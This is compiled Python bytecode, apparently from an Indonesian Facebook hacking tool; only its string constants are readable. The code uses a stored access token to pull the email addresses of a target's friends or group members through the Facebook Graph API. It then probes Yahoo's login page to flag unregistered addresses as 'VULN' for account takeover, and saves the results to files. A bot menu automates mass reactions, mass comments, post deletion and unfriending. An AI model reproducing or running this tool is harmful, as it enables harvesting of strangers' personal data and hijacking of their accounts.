1\x00}\x05\x00t\x0f\x00j\x10\x00|\x05\x00j\x11\x00\x83\x01\x00}\x06\x00t\x02\x00d\x12\x00d\x13\x00\x83\x02\x00}\x07\x00t\x14\x00d\x14\x00\x83\x01\x00\x01d\x15\x00d\x16\x00\x14GHxw\x01|\x06\x00d\x17\x00\x19D]k\x01}\x08\x00|\x01\x00d\x06\x007}\x01\x00|\x00\x00j\x15\x00|\x01\x00\x83\x01\x00\x01|\x08\x00d\x18\x00\x19}\t\x00|\x08\x00d\r\x00\x19}\n\x00t\r\x00j\x0e\x00d\n\x00|\t\x00\x17d\x0b\x00\x17t\x04\x00\x17\x83\x01\x00}\x0b\x00t\x0f\x00j\x10\x00|\x0b\x00j\x11\x00\x83\x01\x00}\x0c\x00y\xf9\x00|\x0c\x00d\x19\x00\x19}\r\x00t\x16\x00j\x17\x00d\x1a\x00\x83\x01\x00}\x0e\x00|\x0e\x00j\x18\x00|\r\x00\x83\x01\x00j\x19\x00\x83\x00\x00}\x0f\x00d\x1b\x00|\x0f\x00k\x06\x00r\xd1\x02t\x1a\x00j\x02\x00d\x1c\x00\x83\x01\x00\x01t\x1b\x00t\x1a\x00j\x1c\x00_\x1d\x00t\x1a\x00j\x1e\x00d\x1d\x00d\x08\x00\x83\x00\x01\x01|\r\x00t\x1a\x00d\x1e\x00<t\x1a\x00j\x1f\x00\x83\x00\x00j\x03\x00\x83\x00\x00}\x10\x00t\x16\x00j\x17\x00d\x1f\x00\x83\x01\x00}\x03\x00y\x19\x00|\x03\x00j\x18\x00|\x10\x00\x83\x01\x00j\x19\x00\x83\x00\x00}\x11\x00Wn\n\x00\x01\x01\x01w{\x01n\x01\x00Xd \x00|\x11\x00k\x06\x00r\xd1\x02|\x07\x00j \x00|\r\x00d!\x00\x17\x83\x01\x00\x01d"\x00|\r\x00\x17d#\x00\x17|\n\x00\x17GHt!\x00j\x15\x00|\r\x00\x83\x01\x00\x01q\xd1\x02n\x00\x00Wq{\x01\x04t\x12\x00k\n\x00r\xe5\x02\x01\x01\x01q{\x01Xq{\x01Wd\x15\x00d\x16\x00\x14GHd$\x00GHd%\x00t"\x00t#\x00t!\x00\x83\x01\x00\x83\x01\x00\x17GHd&\x00GH|\x07\x00j$\x00\x83\x00\x00\x01t\x0c\x00d\x0f\x00\x83\x01\x00\x01t\x13\x00\x83\x00\x00\x01d\x00\x00S(\'\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00R\x90\x00\x00\x00i\x00\x00\x00\x00s2\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mInput ID friend \x1b[1;91m: \x1b[1;97ms\x1b\x00\x00\x00https://graph.facebook.com/s\x0e\x00\x00\x00?access_token=s7\x00\x00\x00\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m R0\x00\x00\x00s\x1b\x00\x00\x00\x1b[1;91m[!] Friend not founds\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]s8\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mGetting email from friend \x1b[1;97m...s\x16\x00\x00\x00/friends?access_token=s\x16\x00\x00\x00out/FriendMailVuln.txtR\x11\x00\x00\x00s$\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mStart \x1b[1;97m...i*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90Rl\x00\x00\x00Rj\x00\x00\x00R?\x00\x00\x00s\x03\x00\x00\x00@.*s\t\x00\x00\x00yahoo.coms_\x00\x00\x00https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.comR>\x00\x00\x00R\xde\x00\x00\x00s$\x00\x00\x00"messages.ERROR_INVALID_USERNAME">.*s"\x00\x00\x00"messages.ERROR_INVALID_USERNAME">s\x01\x00\x00\x00\ns(\x00\x00\x00\x1b[1;97m[ \x1b[1;92mVULN\xe2\x9c\x93\x1b[1;97m ] \x1b[1;92ms\n\x00\x00\x00 \x1b[1;97m=>s2\x00\x00\x00\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mDone \x1b[1;97m....s(\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mTotal \x1b[1;91m: \x1b[1;97msC\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mFile saved \x1b[1;91m:\x1b[1;97m out/FriendMailVuln.txt(%\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R4\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R\x91\x00\x00\x00R\x92\x00\x00\x00R.\x00\x00\x00R/\x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00R,\x00\x00\x00R\xb0\x00\x00\x00R \x00\x00\x00R\x94\x00\x00\x00R\xa1\x00\x00\x00R\x03\x01\x00\x00R\x04\x01\x00\x00R\x05\x01\x00\x00RT\x00\x00\x00RW\x00\x00\x00RX\x00\x00\x00RY\x00\x00\x00RZ\x00\x00\x00R\\\x00\x00\x00R\x19\x00\x00\x00R\xda\x00\x00\x00R\x17\x00\x00\x00R\x0e\x00\x00\x00Rg\x00\x00\x00(\x12\x00\x00\x00R\xdf\x00\x00\x00R\x06\x01\x00\x00R\x9c\x00\x00\x00R\x9d\x00\x00\x00R\x9e\x00\x00\x00R\x07\x01\x00\x00R\x08\x01\x00\x00R\t\x01\x00\x00R\x11\x00\x00\x00Rj\x00\x00\x00Rq\x00\x00\x00R\n\x01\x00\x00R\x1e\x00\x00\x00R\x0b\x01\x00\x00R\x0c\x01\x00\x00Rp\x00\x00\x00R\r\x01\x00\x00R\x0e\x01\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\xff\x00\x00\x00Q\x06\x00\x00s\x84\x00\x00\x00\x00\x02\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\x03\x01\x11\x01\r\x01\x04\x01\r\x01\x05\x01\x06\x01\x06\x01\x0c\x01\x03\x01\x1b\x01\x12\x01\x11\x01\r\x01\x05\x01\n\x01\x0b\x01\n\x01\x1b\x01\x12\x01\x0f\x01\n\x01\t\x01\x11\x01\n\x01\r\x01\n\x01\n\x01\x1b\x01\x12\x01\x03\x01\n\x01\x0f\x01\x15\x01\x0c\x01\r\x01\x0c\x01\x10\x01\n\x01\x12\x01\x0f\x01\x03\x01\x19\x01\x03\x01\x07\x01\x0c\x01\x11\x01\x11\x01\x17\x01\r\x01\x08\x01\t\x01\x05\x01\x15\x01\x05\x01\n\x01\n\x01c\x00\x00\x00\x00\x12\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s1\x03\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00a\x04\x00Wn7\x00\x04t\x05\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x06\x00j\x07\x00d\x06\x00\x83\x01\x00\x01t\x08\x00\x83\x00\x00\x01n\x01\x00Xy\x11\x00t\x00\x00j\t\x00d\x07\x00\x83\x01\x00\x01Wn\x11\x00\x04t\n\x00k\n\x00r\x84\x00\x01\x01\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x0b\x00GHg\x00\x00}\x00\x00d\x08\x00}\x01\x00t\x0c\x00d\t\x00\x83\x01\x00}\x02\x00y>\x00t\r\x00j\x0e\x00d\n\x00|\x02\x00\x17d\x0b\x00\x17t\x04\x00\x17\x83\x01\x00}\x03\x00t\x0f\x00j\x10\x00|\x03\x00j\x11\x00\x83\x01\x00}\x04\x00d\x0c\x00|\x04\x00d\r\x00\x19\x17GHWn\'\x00\x04t\x12\x00k\n\x00r\x16\x01\x01\x01\x01d\x0e\x00GHt\x0c\x00d\x0f\x00\x83\x01\x00\x01t\x13\x00\x83\x00\x00\x01n\x01\x00Xt\x14\x00d\x10\x00\x83\x01\x00\x01t\r\x00j\x0e\x00d\x11\x00|\x02\x00\x17d\x12\x00\x17t\x04\x00\x17\x83\x01\x00}\x05\x00t\x0f\x00j\x10\x00|\x05\x00j\x11\x00\x83\x01\x00}\x06\x00t\x02\x00d\x13\x00d\x14\x00\x83\x02\x00}\x07\x00t\x14\x00d\x15\x00\x83\x01\x00\x01d\x16\x00d\x17\x00\x14GHxw\x01|\x06\x00d\x18\x00\x19D]k\x01}\x08\x00|\x01\x00d\x06\x007}\x01\x00|\x00\x00j\x15\x00|\x01\x00\x83\x01\x00\x01|\x08\x00d\x19\x00\x19}\x02\x00|\x08\x00d\r\x00\x19}\t\x00t\r\x00j\x0e\x00d\x11\x00|\x02\x00\x17d\x1a\x00\x17t\x04\x00\x17\x83\x01\x00}\n\x00t\x0f\x00j\x10\x00|\n\x00j\x11\x00\x83\x01\x00}\x0b\x00y\xf9\x00|\x0b\x00d\x1b\x00\x19}\x0c\x00t\x16\x00j\x17\x00d\x1c\x00\x83\x01\x00}\r\x00|\r\x00j\x18\x00|\x0c\x00\x83\x01\x00j\x19\x00\x83\x00\x00}\x0e\x00d\x1d\x00|\x0e\x00k\x06\x00r\xd1\x02t\x1a\x00j\x02\x00d\x1e\x00\x83\x01\x00\x01t\x1b\x00t\x1a\x00j\x1c\x00_\x1d\x00t\x1a\x00j\x1e\x00d\x1f\x00d\x08\x00\x83\x00\x01\x01|\x0c\x00t\x1a\x00d \x00<t\x1a\x00j\x1f\x00\x83\x00\x00j\x03\x00\x83\x00\x00}\x0f\x00t\x16\x00j\x17\x00d!\x00\x83\x01\x00}\x10\x00y\x19\x00|\x10\x00j\x18\x00|\x0f\x00\x83\x01\x00j\x19\x00\x83\x00\x00}\x11\x00Wn\n\x00\x01\x01\x01w{\x01n\x01\x00Xd"\x00|\x11\x00k\x06\x00r\xd1\x02|\x07\x00j \x00|\x0c\x00d#\x00\x17\x83\x01\x00\x01d$\x00|\x0c\x00\x17d%\x00\x17|\t\x00\x17GHt!\x00j\x15\x00|\x0c\x00\x83\x01\x00\x01q\xd1\x02n\x00\x00Wq{\x01\x04t\x12\x00k\n\x00r\xe5\x02\x01\x01\x01q{\x01Xq{\x01Wd\x16\x00d\x17\x00\x14GHd&\x00GHd\'\x00t"\x00t#\x00t!\x00\x83\x01\x00\x83\x01\x00\x17GHd(\x00GH|\x07\x00j$\x00\x83\x00\x00\x01t\x0c\x00d\x0f\x00\x83\x01\x00\x01t\x13\x00\x83\x00\x00\x01d\x00\x00S()\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00R\x90\x00\x00\x00i\x00\x00\x00\x00s1\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mInput ID group \x1b[1;91m:\x1b[1;97m s%\x00\x00\x00https://graph.facebook.com/group/?id=s\x0e\x00\x00\x00&access_token=s=\x00\x00\x00\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom group \x1b[1;91m:\x1b[1;97m R0\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Group not founds\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]s7\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mGetting email from group \x1b[1;97m...s\x1b\x00\x00\x00https://graph.facebook.com/s5\x00\x00\x00/members?fields=name,id&limit=999999999&access_token=s\x14\x00\x00\x00out/GrupMailVuln.txtR\x11\x00\x00\x00s$\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mStart \x1b[1;97m...i*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90Rl\x00\x00\x00Rj\x00\x00\x00s\x0e\x00\x00\x00?access_token=R?\x00\x00\x00s\x03\x00\x00\x00@.*s\t\x00\x00\x00yahoo.coms_\x00\x00\x00https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.comR>\x00\x00\x00R\xde\x00\x00\x00s$\x00\x00\x00"messages.ERROR_INVALID_USERNAME">.*s"\x00\x00\x00"messages.ERROR_INVALID_USERNAME">s\x01\x00\x00\x00\ns(\x00\x00\x00\x1b[1;97m[ \x1b[1;92mVULN\xe2\x9c\x93\x1b[1;97m ] \x1b[1;92ms\n\x00\x00\x00 \x1b[1;97m=>s2\x00\x00\x00\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mDone \x1b[1;97m....s(\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mTotal \x1b[1;91m: \x1b[1;97msA\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mFile saved \x1b[1;91m:\x1b[1;97m out/GrupMailVuln.txt(%\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R4\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R\x91\x00\x00\x00R\x92\x00\x00\x00R.\x00\x00\x00R/\x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00R,\x00\x00\x00R\xb0\x00\x00\x00R \x00\x00\x00R\x94\x00\x00\x00R\xa1\x00\x00\x00R\x03\x01\x00\x00R\x04\x01\x00\x00R\x05\x01\x00\x00RT\x00\x00\x00RW\x00\x00\x00RX\x00\x00\x00RY\x00\x00\x00RZ\x00\x00\x00R\\\x00\x00\x00R\x19\x00\x00\x00R\xda\x00\x00\x00R\x17\x00\x00\x00R\x0e\x00\x00\x00Rg\x00\x00\x00(\x12\x00\x00\x00R\xdf\x00\x00\x00R\x06\x01\x00\x00Rj\x00\x00\x00R\'\x00\x00\x00R\xa0\x00\x00\x00R\x07\x01\x00\x00R\x08\x01\x00\x00R\t\x01\x00\x00R\x11\x00\x00\x00Rq\x00\x00\x00R\n\x01\x00\x00R\x1e\x00\x00\x00R\x0b\x01\x00\x00R\x0c\x01\x00\x00Rp\x00\x00\x00R\r\x01\x00\x00R\x9d\x00\x00\x00R\x0e\x01\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\x00\x01\x00\x00\x97\x06\x00\x00s\x84\x00\x00\x00\x00\x02\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\x03\x01\x11\x01\r\x01\x04\x01\r\x01\x05\x01\x06\x01\x06\x01\x0c\x01\x03\x01\x1b\x01\x12\x01\x11\x01\r\x01\x05\x01\n\x01\x0b\x01\n\x01\x1b\x01\x12\x01\x0f\x01\n\x01\t\x01\x11\x01\n\x01\r\x01\n\x01\n\x01\x1b\x01\x12\x01\x03\x01\n\x01\x0f\x01\x15\x01\x0c\x01\r\x01\x0c\x01\x10\x01\n\x01\x12\x01\x0f\x01\x03\x01\x19\x01\x03\x01\x07\x01\x0c\x01\x11\x01\x11\x01\x17\x01\r\x01\x08\x01\t\x01\x05\x01\x15\x01\x05\x01\n\x01\n\x01c\x00\x00\x00\x00\x0c\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\x93\x02\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00a\x04\x00Wn7\x00\x04t\x05\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x06\x00j\x07\x00d\x06\x00\x83\x01\x00\x01t\x08\x00\x83\x00\x00\x01n\x01\x00Xy\x11\x00t\x00\x00j\t\x00d\x07\x00\x83\x01\x00\x01Wn\x11\x00\x04t\n\x00k\n\x00r\x84\x00\x01\x01\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x0b\x00GHt\x0c\x00d\x08\x00\x83\x01\x00}\x00\x00y\x1f\x00t\x02\x00|\x00\x00d\x03\x00\x83\x02\x00}\x01\x00|\x01\x00j\r\x00\x83\x00\x00}\x02\x00Wn\'\x00\x04t\x05\x00k\n\x00r\xeb\x00\x01\x01\x01d\t\x00GHt\x0c\x00d\n\x00\x83\x01\x00\x01t\x0e\x00\x83\x00\x00\x01n\x01\x00Xg\x00\x00}\x03\x00d\x0b\x00}\x04\x00t\x0f\x00d\x0c\x00\x83\x01\x00\x01t\x02\x00d\r\x00d\x0e\x00\x83\x02\x00}\x05\x00d\x0f\x00d\x10\x00\x14GHt\x02\x00|\x00\x00d\x03\x00\x83\x02\x00j\r\x00\x83\x00\x00}\x02\x00x\x1a\x01|\x02\x00D]\x12\x01}\x06\x00|\x06\x00j\x10\x00d\x11\x00d\x12\x00\x83\x02\x00}\x02\x00|\x04\x00d\x06\x007}\x04\x00|\x03\x00j\x11\x00|\x04\x00\x83\x01\x00\x01t\x12\x00j\x13\x00d\x13\x00\x83\x01\x00}\x07\x00|\x07\x00j\x14\x00|\x02\x00\x83\x01\x00j\x15\x00\x83\x00\x00}\x08\x00d\x14\x00|\x08\x00k\x06\x00r6\x01t\x16\x00j\x02\x00d\x15\x00\x83\x01\x00\x01t\x17\x00t\x16\x00j\x18\x00_\x19\x00t\x16\x00j\x1a\x00d\x16\x00d\x0b\x00\x83\x00\x01\x01|\x02\x00t\x16\x00d\x17\x00<t\x16\x00j\x1b\x00\x83\x00\x00j\x03\x00\x83\x00\x00}\t\x00t\x12\x00j\x13\x00d\x18\x00\x83\x01\x00}\n\x00y\x19\x00|\n\x00j\x14\x00|\t\x00\x83\x01\x00j\x15\x00\x83\x00\x00}\x0b\x00Wn\n\x00\x01\x01\x01q6\x01n\x01\x00Xd\x19\x00|\x0b\x00k\x06\x00rH\x02|\x05\x00j\x1c\x00|\x02\x00d\x11\x00\x17\x83\x01\x00\x01d\x1a\x00|\x02\x00\x17GHt\x1d\x00j\x11\x00|\x02\x00\x83\x01\x00\x01qH\x02q6\x01q6\x01Wd\x0f\x00d\x10\x00\x14GHd\x1b\x00GHd\x1c\x00t\x1e\x00t\x1f\x00t\x1d\x00\x83\x01\x00\x83\x01\x00\x17GHd\x1d\x00GH|\x05\x00j \x00\x83\x00\x00\x01t\x0c\x00d\n\x00\x83\x01\x00\x01t\x0e\x00\x83\x00\x00\x01d\x00\x00S(\x1e\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00R\x90\x00\x00\x00s,\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mFile path \x1b[1;91m: \x1b[1;97ms\x19\x00\x00\x00\x1b[1;91m[!] File not founds\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]i\x00\x00\x00\x00s$\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mStart \x1b[1;97m...s\x14\x00\x00\x00out/FileMailVuln.txtR\x11\x00\x00\x00i*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90s\x01\x00\x00\x00\nR\n\x00\x00\x00s\x03\x00\x00\x00@.*s\t\x00\x00\x00yahoo.coms_\x00\x00\x00https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.comR>\x00\x00\x00R\xde\x00\x00\x00s$\x00\x00\x00"messages.ERROR_INVALID_USERNAME">.*s"\x00\x00\x00"messages.ERROR_INVALID_USERNAME">s(\x00\x00\x00\x1b[1;97m[ \x1b[1;92mVULN\xe2\x9c\x93\x1b[1;97m ] \x1b[1;92ms2\x00\x00\x00\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mDone \x1b[1;97m....s(\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mTotal \x1b[1;91m: \x1b[1;97msA\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mFile saved \x1b[1;91m:\x1b[1;97m out/FileMailVuln.txt(!\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R4\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R\x91\x00\x00\x00R\x92\x00\x00\x00R.\x00\x00\x00R/\x00\x00\x00R\xf2\x00\x00\x00R\xb0\x00\x00\x00R \x00\x00\x00R\x16\x00\x00\x00R\x94\x00\x00\x00R\xa1\x00\x00\x00R\x03\x01\x00\x00R\x04\x01\x00\x00R\x05\x01\x00\x00RT\x00\x00\x00RW\x00\x00\x00RX\x00\x00\x00RY\x00\x00\x00RZ\x00\x00\x00R\\\x00\x00\x00R\x19\x00\x00\x00R\xda\x00\x00\x00R\x17\x00\x00\x00R\x0e\x00\x00\x00Rg\x00\x00\x00(\x0c\x00\x00\x00t\x05\x00\x00\x00filesR\xf4\x00\x00\x00R\x0b\x01\x00\x00R\xdf\x00\x00\x00R\x06\x01\x00\x00R\t\x01\x00\x00R\xf6\x00\x00\x00R\x0c\x01\x00\x00Rp\x00\x00\x00R\r\x01\x00\x00R\x9d\x00\x00\x00R\x0e\x01\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\x01\x01\x00\x00\xdd\x06\x00\x00sp\x00\x00\x00\x00\x02\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\x03\x01\x11\x01\r\x01\x04\x01\r\x01\x05\x01\x0c\x01\x03\x01\x0f\x01\x10\x01\r\x01\x05\x01\n\x01\x0b\x01\x06\x01\x06\x01\n\x01\x0f\x01\t\x01\x15\x01\r\x01\x12\x01\n\x01\r\x01\x0f\x01\x15\x01\x0c\x01\r\x01\x0c\x01\x10\x01\n\x01\x12\x01\x0f\x01\x03\x01\x19\x01\x03\x01\x07\x01\x0c\x01\x11\x01\t\x01\x17\x01\t\x01\x05\x01\x15\x01\x05\x01\n\x01\n\x01c\x00\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\xaa\x00\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x04\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x06\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x08\x00GHd\x07\x00GHd\x08\x00GHd\t\x00GHd\n\x00GHd\x0b\x00GHd\x0c\x00GHd\r\x00GHd\x0e\x00GHd\x0f\x00GHt\t\x00\x83\x00\x00\x01d\x00\x00S(\x10\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00s?\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m1.\x1b[1;97m Bot Reactions Target Posts=\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m2.\x1b[1;97m Bot Reactions Grup Posts;\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m3.\x1b[1;97m Bot Komen Target Posts9\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m4.\x1b[1;97m Bot Komen Grup Posts6\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m5.\x1b[1;97m Mass delete Posts8\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m6.\x1b[1;97m Mass accept friends8\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m7.\x1b[1;97m Mass delete friends*\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;91m0.\x1b[1;97m Backs\x03\x00\x00\x00\xe2\x95\x91(\n\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R.\x00\x00\x00t\t\x00\x00\x00bot_pilih(\x01\x00\x00\x00R4\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>t\x08\x00\x00\x00menu_bot\x1c\x07\x00\x00s(\x00\x00\x00\x00\x01\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\r\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01c\x00\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s\xe7\x00\x00\x00t\x00\x00d\x01\x00\x83\x01\x00}\x00\x00|\x00\x00d\x02\x00k\x02\x00r\'\x00d\x03\x00GHt\x01\x00\x83\x00\x00\x01n\xbc\x00|\x00\x00d\x04\x00k\x02\x00r=\x00t\x02\x00\x83\x00\x00\x01n\xa6\x00|\x00\x00d\x05\x00k\x02\x00rS\x00t\x03\x00\x83\x00\x00\x01n\x90\x00|\x00\x00d\x06\x00k\x02\x00ri\x00t\x04\x00\x83\x00\x00\x01nz\x00|\x00\x00d\x07\x00k\x02\x00r\x7f\x00t\x05\x00\x83\x00\x00\x01nd\x00|\x00\x00d\x08\x00k\x02\x00r\x95\x00t\x06\x00\x83\x00\x00\x01nN\x00|\x00\x00d\t\x00k\x02\x00r\xab\x00t\x07\x00\x83\x00\x00\x01n8\x00|\x00\x00d\n\x00k\x02\x00r\xc1\x00t\x08\x00\x83\x00\x00\x01n"\x00|\x00\x00d\x0b\x00k\x02\x00r\xd7\x00t\t\x00\x83\x00\x00\x01n\x0c\x00d\x03\x00GHt\x01\x00\x83\x00\x00\x01d\x00\x00S(\x0c\x00\x00\x00Ns\x1d\x00\x00\x00\x1b[1;97m\xe2\x95\x9a\xe2\x95\x90\x1b[1;91mD \x1b[1;97mR\n\x00\x00\x00s\x16\x00\x00\x00\x1b[1;91m[!] Wrong inputR8\x00\x00\x00R9\x00\x00\x00Rs\x00\x00\x00Rt\x00\x00\x00R\x81\x00\x00\x00R\x82\x00\x00\x00R\x83\x00\x00\x00R:\x00\x00\x00(\n\x00\x00\x00R/\x00\x00\x00R\x10\x01\x00\x00t\n\x00\x00\x00menu_reactt\n\x00\x00\x00grup_reactt\t\x00\x00\x00bot_koment\n\x00\x00\x00grup_koment\n\x00\x00\x00deletepostt\x06\x00\x00\x00acceptt\x08\x00\x00\x00unfriendR+\x00\x00\x00(\x01\x00\x00\x00t\x04\x00\x00\x00bots(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\x10\x01\x00\x002\x07\x00\x00s,\x00\x00\x00\x00\x01\x0c\x01\x0c\x01\x05\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x02\x05\x01c\x00\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\xa5\x00\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x04\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x06\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x08\x00GHd\x07\x00GHd\x08\x00GHd\t\x00GHd\n\x00GHd\x0b\x00GHd\x0c\x00GHd\r\x00GHd\x0e\x00GHt\t\x00\x83\x00\x00\x01d\x00\x00S(\x0f\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00s*\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m1. \x1b[1;97mLikes*\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m2. \x1b[1;97mLoves)\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m3. \x1b[1;97mWows*\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m4. 